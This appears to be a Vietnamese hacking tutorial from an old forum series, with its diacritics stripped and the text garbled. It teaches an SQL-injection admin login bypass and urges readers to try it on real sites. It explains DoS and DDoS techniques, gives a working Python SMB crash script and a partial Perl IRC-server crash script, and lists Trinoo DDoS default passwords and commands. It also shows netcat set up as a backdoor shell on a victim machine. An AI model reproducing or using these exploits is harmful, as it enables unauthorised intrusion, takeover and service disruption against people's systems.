Login : ` or ``=`
Password : ` or ``=`

_ Nu thnh cng bn s xm nhp vo Web b li vi vai tr l admin .
_ Ta hy tm hiu v cch fix li ny nh :
+ Lc cc k t c bit nh ` `` ~ \ bng cch chm vo javascrip on m sau :

CODE
function RemoveBad(strTemp)
{
strTemp = strTemp.replace(/\<|\ > |\``|\`|\%|\;|$|$|\&|\+|
\-/g,````);
return strTemp;
}

+ V gi n t bn trong ca asp script :

CODE
var login = var TempStr = RemoveBad
(Request.QueryString(``login``));
var password = var TempStr = RemoveBad
(Request.QueryString(``password``));

- Vy l ta fix xong li .
- Cc bn c th p dng cch hack ny cho cc trang Web khc c submit d liu , cc
bn hy test th xem i , cc trang Web Vit Nam mnh b nhiu lm , ti kim c
kha kh pass admin bng cch th ny ri ( nhng cng bo h fix li ) .
- C nhiu trang khi login khng phi bng ` or ``= m bng cc nick name c tht
ng k trn trang Web , ta vo link thnh vin kim nick ca mt admin test
th nh .
Hack vui v .

phn 6 ti s cp n kiu tn cng t chi dch v ( DoS attack ) , mt kiu tn
cng li hi lm cho trang Web hng mnh nh HVA ca chng ta b tt nghn ch
trong thI gian ngn cc admin bn i ung cafe ht m khng ai trng coi . Km theo
l cc phng php tn cng DoS v ang c s dng .

GOOKLUCK!!!!!!!!!!!!!!!!!!!!
6 [12/22/2004 10:04:00 AM]

38.) DoS attack l g? ( Denial Of Services Attack )

DoS attack ( dch l tn cng t chi dch v ) l kiu tn cng rt li hi , vi loi tn
cng ny , bn ch cn mt my tnh kt ni Internet l c th thc hin vic tn cng
c my tnh ca I phng . thc cht ca DoS attack l hacker s chim dng mt
lng ln ti nguyn trn server ( ti nguyn c th l bng thng, b nh, cpu, a
cng, ... ) lm cho server khng th no p ng cc yu cu t cc my ca ngui khc (
my ca nhng ngi dng bnh thng ) v server c th nhanh chng b ngng hot
ng, crash hoc reboot .

39.) Cc loi DoS attack hin ang c bit n v s dng :

a . ) Winnuke :

_DoS attack loi ny ch c th p dng cho cc my tnh ang chy Windows9x .
Hacker s gi cc gi tin vi d liu `Òut of Band`` n cng 139 ca my tnh ch.(
Cng 139 chnh l cng NetBIOS, cng ny ch chp nhn cc gi tin c c Out of Band
c bt ) . Khi my tnh ca victim nhn c gi tin ny, mt mn hnh xanh bo li s
c hin th ln vi nn nhn do chng trnh ca Windows nhn c cc gi tin ny
nhng n li khng bit phn ng vi cc d liu Out Of Band nh th no dn n h
thng s b crash .

b . ) Ping of Death :

_ kiu DoS attack ny , ta ch cn gi mt gi d liu c kch thc ln thng qua lnh
ping n my ch th h thng ca h s b treo .
_ VD : ping l 65000

c . ) Teardrop :

_ Nh ta bit , tt c cc d liu chuyn i trn mng t h thng ngun n h thng
ch u phi tri qua 2 qu trnh : d liu s c chia ra thnh cc mnh nh h thng
ngun, mi mnh u phi c mt gi tr offset nht nh xc nh v tr ca mnh
trong gi d liu c chuyn i. Khi cc mnh ny n h thng ch, h thng ch s
da vo gi tr offset sp xp cc mnh li vi nhau theo th t ng nh ban u .
Li dng s h , ta ch cn gi n h thng ch mt lot gi packets vi gi tr offset
chng cho ln nhau. H thng ch s khng th no sp xp li cc packets ny, n
khng iu khin c v c th b crash, reboot hoc ngng hot ng nu s lng gi
packets vi gi tr offset chng cho ln nhau qu ln !

d . ) SYN Attack :

_ Trong SYN Attack, hacker s gi n h thng ch mt lot SYN packets vi a ch
ip ngun khng c thc. H thng ch khi nhn c cc SYN packets ny s gi tr li
cc a ch khng c thc v ch I nhn thng tin phn hi t cc a ch ip gi .
V y l cc a ch ip khng c thc, nn h thng ch s s ch i v ch v cn a
cc ``request`` ch i ny vo b nh , gy lng ph mt lng ng k b nh trn my
ch m ng ra l phi dng vo vic khc thay cho phi ch i thng tin phn hi
khng c thc ny . Nu ta gi cng mt lc nhiu gi tin c a ch IP gi nh vy th h
thng s b qu ti dn n b crash hoc boot my tnh . == > nm du tay .

e . ) Land Attack :

_ Land Attack cng gn ging nh SYN Attack, nhng thay v dng cc a ch ip khng
c thc, hacker s dng chnh a ch ip ca h thng nn nhn. iu ny s to nn mt
vng lp v tn gia trong chnh h thng nn nhn , gia mt bn cn nhn thng tin
phn hi cn mt bn th chng bao gi gi thng tin phn hi i c . == > Gy ng
p lng ng .

f . ) Smurf Attack :

_Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tn cng), mng
khuch i (s nghe lnh ca hacker) v h thng ca nn nhn. Hacker s gi cc gi tin
ICMP n a ch broadcast ca mng khuch i. iu c bit l cc gi tin ICMP
packets ny c a ch ip ngun chnh l a ch ip ca nn nhn . Khi cc packets n
c a ch broadcast ca mng khuch i, cc my tnh trong mng khuch i s
tng rng my tnh nn nhn gi gi tin ICMP packets n v chng s ng lot gi
tr li h thng nn nhn cc gi tin phn hi ICMP packets. H thng my nn nhn s
khng chu ni mt khi lng khng l cc gi tin ny v nhanh chng b ngng hot
ng, crash hoc reboot. Nh vy, ch cn gi mt lng nh cc gi tin ICMP packets i
th h thng mng khuch i s khuch i lng gi tin ICMP packets ny ln gp bI .
T l khuch i ph thuc vo s mng tnh c trong mng khuch I . Nhim v ca
cc hacker l c chim c cng nhiu h thng mng hoc routers cho php chuyn
trc tip cc gi tin n a ch broadcast khng qua ch lc a ch ngun cc u ra
ca gi tin . C c cc h thng ny, hacker s d dng tin hnh Smurf Attack trn
cc h thng cn tn cng . == > mt my lm chng si nh , chc my chm li ta nh
cho thua .

g . ) UDP Flooding :

_ Cch tn cng UDP i hi phi c 2 h thng my cng tham gia. Hackers s lm cho
h thng ca mnh i vo mt vng lp trao i cc d liu qua giao thc UDP. V gi
mo a ch ip ca cc gi tin l a ch loopback ( 127.0.0.1 ) , ri gi gi tin ny n h
thng ca nn nhn trn cng UDP echo ( 7 ). H thng ca nn nhn s tr li li cc
messages do 127.0.0.1( chnh n ) gi n , kt qu l n s i vng mt vng lp v tn.
Tuy nhin, c nhiu h thng khng cho dng a ch loopback nn hacker s gi mo
mt a ch ip ca mt my tnh no trn mng nn nhn v tin hnh ngp lt UDP
trn h thng ca nn nhn . Nu bn lm cch ny khng thnh cng th chnh my ca
bn s b y .

h . ) Tn cng DNS :

_ Hacker c th i mt li vo trn Domain Name Server ca h thng nn nhn ri cho
ch n mt website no ca hacker. Khi my khch yu cu DNS phn tch a ch b
xm nhp thnh a ch ip, lp tc DNS ( b hacker thay i cache tm thI ) s i
thnh a ch ip m hacker cho ch n . Kt qu l thay v phi vo trang Web
mun vo th cc nn nhn s vo trang Web do chnh hacker to ra . Mt cch tn cng
t chi dch v tht hu hiu !.

g . ) Distributed DoS Attacks ( DDos ) :

_ DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cc hackers s c
thm nhp vo cc mng my tnh c bo mt km, sau ci ln cc h thng ny
chng trnh DDoS server. By gi cc hackers s hn nhau n thi gian nh s
dng DDoS client kt ni n cc DDoS servers, sau ng lot ra lnh cho cc DDoS
servers ny tin hnh tn cng DDoS n h thng nn nhn .

h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) :

_ y c l l kiu tn cng li hi nht v lm boot my tnh ca i phng nhanh gn
nht . Cch lm th cng tng t nh DDos nhng thay v tn cng bng nhiu my tnh
th ngI tn cng ch cn dng mt my tn cng thng qua cc server ln trn th gii .
Vn vi phng php gi mo a ch IP ca victim , k tn cng s gi cc gi tin n
cc server mnh nht , nhanh nht v c ng truyn rng nht nh Yahoo .v.v , cc
server ny s phn hi cc gi tin n a ch ca victim . Vic cng mt lc nhn
c nhiu gi tin thng qua cc server ln ny s nhanh chng lm nghn ng truyn
ca my tnh nn nhn v lm crash , reboot my tnh . Cch tn cng ny li hi
ch ch cn mt my c kt ni Internet n gin vi ng truyn bnh thng cng c
th nh bt c h thng c ng truyn tt nht th giI nu nh ta khng kp ngn
chn . Trang Web HVA ca chng ta cng b DoS va ri bi cch tn cng ny y .

40 . ) K thut DoS Web bng Python :

_ K thut ny ch c th s dng duy nht trn WinNT , v bn cn phi c thi gian th
my tnh ca nn nhn mi b down c .
_ Bn hy download Pyphon ti http://www.python.org/ s dng .
_ Bn hy save on m sau ln file rfpoison.py .

CODE
import string
import struct
from socket import *
import sys
def a2b(s):
bytes = map(lambda x: string.atoi(x, 16),
string.split(s))
data = string.join(map(chr, bytes), ``)
return data
def b2a(s):
bytes = map(lambda x: `%.2x` % x, map(ord, s))
return string.join(bytes, ` `)

# Yu cu tp hp NBSS
nbss_session = a2b(``````
81 00 00 48 20 43 4b 46 44 45
4e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43
41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45
42 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 46
43 43 41 43 41 43 41 43 41 43 41 41 41 00 00 00
00 00
``````)

# To SMB
crud = (
# Yu cu SMBnegprot
``````
ff 53 4d 42 72 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43
20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d
20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20
4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d
49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b
53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30
00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d
62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e
30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00
``````,
# Yu cu setup SMB X
``````
ff 53 4d 42 73 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff
ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00
00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f
55 50 00 55 6e 69 78 00 53 61 6d 62 61 00
``````,
# Yu cu SMBtconX
``````
ff 53 4d 42 75 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00
00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56
45 52 5c 49 50 43 24 00 49 50 43 00
``````,
# Yu cu khI to SMBnt X
``````
ff 53 4d 42 a2 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00
07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00
00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00
00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72
76 73 76 63 00
``````,
# yu cu bin dch SMB
``````
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00
00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49
50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00
00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00
00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78
5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c
c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
``````,
# SMBtrans Request
``````
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00
00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49
50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00
00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00
00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00
5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00
56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00
00 00 00 00 00 00 ff ff ff ff 00 00 00 00
``````
)
crud = map(a2b, crud)
def smb_send(sock, data, type=0, flags=0):
d = struct.pack(`!BBH`, type, flags, len(data))
#print `send:`, b2a(d+data)
sock.send(d+data)
def smb_recv(sock):
s = sock.recv(4)
assert(len(s) == 4)
type, flags, length = struct.unpack(`!BBH`, s)
data = sock.recv(length)
assert(len(data) == length)
#print `recv:`, b2a(s+data)
return type, flags, data
def nbss_send(sock, data):
sock.send(data)
def nbss_recv(sock):
s = sock.recv(4)
assert(len(s) == 4)
return s
def main(host, port=139):
s = socket(AF_INET, SOCK_STREAM)
s.connect(host, port)
nbss_send(s, nbss_session)
nbss_recv(s)
for msg in crud[:-1]:
smb_send(s, msg)
smb_recv(s)
smb_send(s, crud[-1]) # no response to this
s.close()
if __name__ == `__main__`:
print `Sending poison...`,
main(sys.argv[1])
print `done.`

c th lm down c server ca i phng bn cn phi c thi gian DoS , nu
khng c iu kin ch i tt nht bn khng nn s dng cch ny . Nhng vc th
cho bit th c ng khng ?

41 . ) Tn cng DDoS thng qua Trinoo :

_ Bn bit DDoS attack l g ri phi khng ? Mt cuc tn cng DDoS bng Trinoo
c thc hin bi mt kt ni ca Hacker Trinoo Master v ch dn cho Master pht
ng mt cuc tn cng DDoS n mt hay nhiu mc tiu. Trinoo Master s lin lc vi
nhng Deadmons a nhng a ch c dn n tn cng mt hay nhiu mc tiu
trong khong thi gian xc nh .
_ C Master v Deamon u c bo v bng Passwd . ch khi chng ta bit passwd th
mi c th iu khin c chng , iu ny khng c g kh khn nu chng ta l ch
nhn thc s ca chng . Nhng passwd ny thng c m ho v bn c th thit lp
khi bin dch Trinoo t Source ----- > Binnary. Khi c chy , Deadmons s hin ra mt
du nhc v ch passwd nhp vo , nu passwd nhp sai n s t ng thot cn nu
passwd c nhp ng th n s t ng chy trn nn ca h thng .

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is `^]`.
kwijibo
Connection closed by foreign host. < == Bn nhp sai

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo > < == bn vo c h thng trinoo

_ y l vi passwd mc nh :

l44adsl``: pass ca trinoo daemon .
``gorave``: passwd ca trinoo master server khi startup .
``betaalmostdone``: passwd iu khin t xa chung cho trinoo master .
``killme``: passwd trinoo master iu khin lnh ``mdie`` .

_ y l mt s lnh dng iu khin Master Server:

CODE
die------------------------------------------------ ------------Shutdown.
quit----------------------------------------------- -------------Log off.
mtimer N-------------------------------------------------- --t thI gian tn cng DoS , vI
N nhn gi tr t 1-- > 1999 giy .
dos IP------------------------------------------------- ------Tn cng n mt a ch IP xc
nh .
mdie pass----------------------------------------------- ----V hiu ho tt c cc Broadcast ,
nu nh passwd chnh xc . Mt lnh c gi ti (``d1e l44adsl``) Broadcast
Shutdown chng . Mt passwd ring bit s c t cho mc ny
mping---------------------------------------------- ----------Gi mt lnh ping ti (``png
l44adsl``) cc Broadcast.
mdos ------------------------------------------Send nhiu lnh DOS (``xyz l44adsl
123:ip1:ip2``) n cc Broadcast.
info----------------------------------------------- --------------Hin th thng tin v Trinoo .
msize---------------------------------------------- ------------t kch thc m cho nhng gi
tin c send i trong sut thI gian DoS.
nslookup host----------------------------------------------X c nh tn thit b ca Host m
Master Trinoo ang chy .
usebackup------------------------------------------ ---------Chuyn tI cc file Broadcast sao
lu c to bi lnh killdead.
bcast---------------------------------------------- -------------Lit k danh sch tt c cc
Broadcast c th khai thc .
help [cmd] --------------------------------------------------- a ra danh sch cc lnh .
mstop---------------------------------------------- -------------Ngng li cc cuc tn cng DOS
.

_ y l mt s lnh dng iu khin Trinoo Deadmons:

CODE
aaa pass IP------------------------------------------------- ---Tn cng n a ch IP xc
nh . GI gi tin UDP (0-65534) n cng ca UDP ca a ch IP xc nh trong mt
khong thi gian xc nh c mc nh l 120s hay t 1-- > 1999 s .
bbb pass N-------------------------------------------------- ---t thI gian gii hn cho cc
cuc tn cng DOS .
Shi pass----------------------------------------------- ---------Gi chui *HELLO* ti dnh
sch Master Server c bin dch trong chng trnh trn cng 31335/UDP.
png pass----------------------------------------------- --------Send chui Pong tI Master
Server pht hnh cc lnh iu khin trn cng 31335/UDP.
die pass----------------------------------------------- ---------Shutdown Trinoo.
rsz N-------------------------------------------------- ----------L kch thc ca b m c
dng tn cng , n c tnh bng byte .
xyz pass 123:ip1:ip3---------------------------------------- tn cng DOS nhiu mc tiu cng
lc .

( Da theo hng dn ca huynh Binhnx2000 )
Cn nhiu on m v cch ng dng DoS lm , cc bn chu kh tm hiu thm nh .
Nhng ng tn cng lung tung , nht l server ca HVA , coi chng khng thu c
hiu qu m cn b lock nick na

Ht phn 6 - Anhdenday
7 [12/22/2004 10:10:00 AM]

42 . ) K thut n cng DoS vo WircSrv Irc Server v5.07 :

WircSrv IRC l mt Server IRC thng dng trn Internet ,n s b Crash nu nh b cc
Hacker gi mt Packet ln hn gi tr ( 65000 k t ) cho php n Port 6667.
Bn c th thc hin vic ny bng cch Telnet n WircSrv trn Port 6667:

Nu bn dng Unix:

[hellme@die-communitech.net$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
[buffer]

Windows cng tng t:

telnet irc.example.com 6667

Lu : [buffer] l Packet d liu tng ng vi 65000 k t .
Tuy nhin , chng ta s crash n rt n gin bng on m sau ( Cc bn hy nhn vo
on m v t mnh gii m nhng cu lnh trong , cng l mt trong nhng cch
tp luyn cho s phn x ca cc hacker khi h nghin cu . No , chng ta hy phn tch
n mt cch cn bn ):

CODE
#!/usr/bin/perl #< == on m ny cho ta bit l dng cho cc lnh trong perl
use Getopt::Std;
use Socket;
getopts(`s:`, \%args);
if(!defined($args{s})){&usage;}
my($serv,$port,$foo,$number,$data,$buf,$in_addr,$pa ddr,$proto);
$foo = `À``; # y l NOP
$number = ``65000``; # y l tt c s NOP
$data .= $foo x $number; # kt qu ca $foo times $number
$serv = $args{s}; # lnh iu khin server t xa
$port = 6667; # lnh iu khin cng t xa , n c mc nh l 6667
$buf = ``$data``;
$in_addr = (gethostbyname($serv))[4]
8 [2/17/2005 9:14:00 AM]

47.) Cc cng c cn thit hack Web :

i vi cc hacker chuyn nghip th h s khng cn s dng nhng cng c ny m h
s trc tip setup phin bn m trang Web nn nhn s dng trn my ca mnh test
li . Nhng i vi cc bn mi vo ngh th nhng cng c ny rt cn thit , hy s
dng chng mt vi ln bn s bit cch phi hp chng vic tm ra li trn cc trang
Web nn nhn c nhanh chng nht . Sau y l mt s cng c bn cn phi c trn
my lm n ca mnh :

Cng c th 1 : Mt ci proxy dng che du IP v vt tng la khi cn ( Cch to
1 ci Proxy ti by phn 7 , cc bn hy xem li nh ) .
Cng c th 2 : Bn cn c 1 shell account, ci ny thc s quan trng i vi bn . Mt
shell account tt l 1 shell account cho php bn chy cc chng trnh chnh nh
nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...v shell account cn phi ci
chng trnh GCC ( rt quan trng trong vic dch (compile) cc exploit c vit bng
C) nh MinGW, Cygwin v cc dev tools khc.
Shell account gn ging vi DOS shell,nhng n c nhiu cu lnh v chc nng hn
DOS . Thng thng khi bn ci Unix th bn s c 1 shell account, nu bn khng ci
Unix th bn nn ng k trn mng 1 shell account free hoc nu c ai ci Unix v
thit lp cho bn 1 shell account th bn c th log vo telnet (Start -- > Run -- > g
Telnet) dng shell account . Sau y l 1 s a ch bn c th ng k free shell
account :
http://www.freedomshell.com/
http://www.cyberspace.org/shell.html
http://www.ultrashell.net/
_Cng c th 3 : NMAP l Cng c qut cc nhanh v mnh. C th qut trn mng din
rng v c bit tt i vi mng n l. NMAP gip bn xem nhng dch v no ang
chy trn server (services / ports : webserver , ftpserver , pop3,...),server ang dng h
iu hnh g,loi tng la m server s dng,...v rt nhiu tnh nng khc.Ni chung
NMAP h tr hu ht cc k thut qut nh : ICMP (ping aweep),IP protocol , Null scan
, TCP SYN (half open),... NMAP c nh gi l cng c hng u ca cc Hacker
cng nh cc nh qun tr mng trn th gii.
Mi thng tin v NMAP bn tham kho ti http://www.insecure.org/ .
_ Cng c th 4 : Stealth HTTP Security Scanner l cng c qut li bo mt tuyt vi
trn Win32. N c th qut c hn 13000 li bo mt v nhn din c 5000 exploits
khc.
_ Cng c th 5 : IntelliTamper l cng c hin th cu trc ca mt Website gm nhng
th mc v file no, n c th lit k c c th mc v file c set password. Rt tin
cho vic Hack Website v trc khi bn Hack mt Website th bn phi nm mt s thng
tin ca Admin v Website .
_ Cng c th 6 : Netcat l cng c c v ghi d liu qua mng thng qua giao thc
TCP hoc UDP. Bn c th dng Netcat 1 cch trc tip hoc s dng chng trnh script
khc iu khin Netcat. Netcat c coi nh 1 exploitation tool do n c th to c
lin kt gia bn v server cho vic c v ghi d liu ( tt nhin l khi Netcat c
ci trn 1 server b lI ). Mi thng tin v Netcat bn c th tham kho ti
http://www.l0pht.com/ .
_ Cng c th 7 : Active Perl l cng c c cc file Perl ui *.pl v cc exploit thng
c vit bng Perl . N cn c s dng thi hnh cc lnh thng qua cc file *.pl .
_ Cng c th 8 : Linux l h iu hnh hu ht cc hacker u s dng.
_ Cng c th 9 : L0phtCrack l cng c s mt Crack Password ca Windows
NT/2000 .
_ Cch Download ti by ri nn khng ni y , cc bn khi Download nh ch
n cc phin bn ca chng , phin bn no c s ln nht th cc bn hy Down v m
si v n s c thm mt s tnh nng m cc phin bn trc cha c . Nu down v m
cc bn khng bit s dng th tm li cc bi vit c c hng dn bn Box ngh .
Nu vn khng thy th c post bi hi , cc bn bn s tr li cho bn .

48 . ) Hng dn s dng Netcat :

a . ) Gii thiu : Netcat l mt cng c khng th thiu c nu bn mun hack mt
website no v n rt mnh v tin dng . Do bn cn bit mt cht v Netcat .
b . ) Bin dch :
_ i vi bn Netcat cho Linux, bn phi bin dch n trc khi s dng.
- hiu chnh file netcat.c bng vi: vi netcat.c
+ tm dng res_init(); trong main() v thm vo trc 2 du ``/``: // res_init();
+ thm 2 dng sau vo phn #define (nm u file):

#define GAPING_SECURITY_HOLE
#define TELNET

- bin dch: make linux
- chy th: ./nc -h
- nu bn mun chy Netcat bng nc thay cho ./nc, bn ch cn hiu chnh li bin mi
trng PATH trong file ~/.bashrc, thm vo ``:.``
PATH=/sbin:/usr/sbin:...:.
_ Bn Netcat cho Win khng cn phi compile v c sn file nh phn nc.exe. Ch vy
gii nn v chy l xong.
c . ) Cc ty chn ca Netcat :
_ Netcat chy ch dng lnh. Bn chy nc -h bit cc tham s:

CODE
C: > nc -h
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d ----------- tch Netcat khi ca s lnh hay l console, Netcat s chy ch
steath(khng hin th trn thanh Taskbar)
-e prog --- thi hnh chng trnh prog, thng dng trong ch lng nghe
-h ----------- gi hng dn
-i secs ----- tr hon secs mili giy trc khi gi mt dng d liu i
-l ------------- t Netcat vo ch lng nghe ch cc kt ni n
-L ------------ buc Netcat ``c`` lng nghe. N s lng nghe tr li sau mi khi ngt mt
kt ni.
-n ------------ ch dng a ch IP dng s, chng hn nh 192.168.16.7, Netcat s khng
thm vn DNS
-o ------------ file ghi nht k vo file
-p port ----- ch nh cng port
-r yu cu Netcat chn cng ngu nhin(random)
-s addr ----- gi mo a ch IP ngun l addr
-t ------------- khng gi cc thng tin ph i trong mt phin telnet. Khi bn telnet n
mt telnet daemon(telnetd), telnetd thng yu cu trnh telnet client ca bn gi n cc
thng tin ph nh bin mi trng TERM, USER. Nu bn s dng netcat vi ty chn -t
telnet, netcat s khng gi cc thng tin ny n telnetd.
-u ------------- dng UDP(mc nh netcat dng TCP)
-v ------------- hin th chi tit cc thng tin v kt ni hin ti.
-vv ----------- s hin th thng tin chi tit hn na.
-w secs ---- t thi gian timeout cho mi kt ni l secs mili giy
-z ------------- ch zero I/O, thng c s dng khi scan port

Netcat h tr phm vi cho s hiu cng. C php l cng1-cng2. V d: 1-8080 ngha l
1,2,3,..,8080

d . ) Tm hiu Netcat qua cc VD :

_ Chp banner ca web server :

V d: nc n 172.16.84.2, cng 80

CODE
C: > nc 172.16.84.2 80
HEAD / HTTP/1.0 (ti y bn g Enter 2 ln)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html

bit thng tin chi tit v kt ni, bn c th dng v ( -vv s
cho bit cc thng tin chi tit hn na)

C: > nc -vv 172.16.84.1 80

CODE
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: ``0-cec-3899eaea``
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK

Nu mun ghi nht k, hy dng -o . V d:

nc -vv -o nhat_ki.log 172.16.84.2 80

xem file nhat_ki.log xem th n ghi nhng g nh :

CODE
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: ``0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea``..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....

du < ngha l server gi n netcat
du > ngha l netcat gi n server

_ Qut cng :
Bn hy chy netcat vi ty chn z . Nhng qut cng nhanh hn, bn hy dng -n v
netcat s khng cn thm vn DNS. V d scan cc cng TCP(1- > 500) ca host
172.16.106.1

CODE
[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open

nu bn cn scan cc cng UDP, dng -u

CODE
[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open

_ Bin Netcat thnh mt trojan :
Trn my tnh ca nn nhn, bn khi ng netcat vo ch lng nghe, dng ty chn
l ( listen ) v -p port xc nh s hiu cng cn lng nghe, -e yu cu netcat thi hnh
1 chng trnh khi c 1 kt ni n, thng l shell lnh cmd.exe ( i vi NT) hoc
/bin/sh(i vi Unix). V d:

CODE
E: > nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error

Trn my tnh dng tn cng, bn ch vic dng netcat ni n my nn nhn trn
cng nh, chng hn nh 8080

CODE
C: > nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
E: > cd test
cd test
E: est > dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F
Directory of E: est
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
C: est > exit
exit
sent 20, rcvd 450: NOTSOCK

Nh cc bn thy , ta c th lm nhng g trn my ca nn nhn ri , ch cn mt s
lnh c bn , ta chim c my tnh ca i phng , cc bn hy xem tip nh :

CODE
E: > nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...?
?

Ring i vi Netcat cho Win, bn c th lng nghe ngay trn cng ang lng nghe. Ch
cn ch nh a ch ngun l -s<a_ch_ip_ca_my_ny > . V d:

CODE
netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cng 53 ang lng nghe
...
